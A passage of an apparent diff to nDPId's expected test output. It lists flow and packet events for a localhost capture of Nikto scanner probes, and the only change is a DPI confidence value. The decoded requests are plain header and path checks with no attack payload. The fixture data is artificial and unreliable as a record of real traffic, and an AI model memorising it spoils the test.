00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1576420276754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420276754,"pkt":"AAAAAAAAAAAAAAAACABFAADbnMVAAEAGn1V\/AAABfwAAAcIAH5C\/caTogsAMB4AYAED+zwAAAQEICp1m+zqdZvs5R0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCk9yaWdpbjogbmlrdG8uZXhhbXBsZS5jb20NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} +01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1576420276756,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420276756,"pkt":"AAAAAAAAAAAAAAAACABFAADW2EVAAEAGY9p\/AAABfwAAAcICH5Ck9+BnopzEpIAYAED+ygAAAQEICp1m+zydZvs8R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KT3JpZ2luOiAuZXhhbXBsZS5jb20NCg0K"} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} +01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1576420276758,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276758,"pkt":"AAAAAAAAAAAAAAAACABFAADPoehAAEAGmj5\/AAABfwAAAcIEH5AAZJnEB3vRtYAYAED+wwAAAQEICp1m+z6dZvs+R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1576420276760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276760,"pkt":"AAAAAAAAAAAAAAAACABFAADRGS1AAEAGIvh\/AAABfwAAAcIGH5CUqCEOlTzFf4AYAED+xQAAAQEICp1m+0CdZvtAR0VUIC9qdW5rOTk5LmFzcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk999.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk999.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1576420276761,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276761,"pkt":"AAAAAAAAAAAAAAAACABFAADQx0dAAEAGdN5\/AAABfwAAAcIIH5Btvf9kj27E6oAYAED+xAAAAQEICp1m+0GdZvtBR0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1576420276763,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420276763,"pkt":"AAAAAAAAAAAAAAAACABFAADSXUtAAEAG3th\/AAABfwAAAcIKH5BTRGVwA03HQYAYAED+xgAAAQEICp1m+0OdZvtCR0VUIC9qdW5rOTg4LmFzcHggSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk988.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk988.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1576420276764,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276764,"pkt":"AAAAAAAAAAAAAAAACABFAADP8RNAAEAGSxN\/AAABfwAAAcIMH5D+v8k3Lccr2IAYAED+wwAAAQEICp1m+0SdZvtER0VUIC9sb2dpbi5hc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1576420276765,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276765,"pkt":"AAAAAAAAAAAAAAAACABFAADQIn9AAEAGGad\/AAABfwAAAcIOH5Dotxpb5DtnaoAYAED+xAAAAQEICp1m+0WdZvtFR0VUIC9sb2dpbi5hc3B4IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 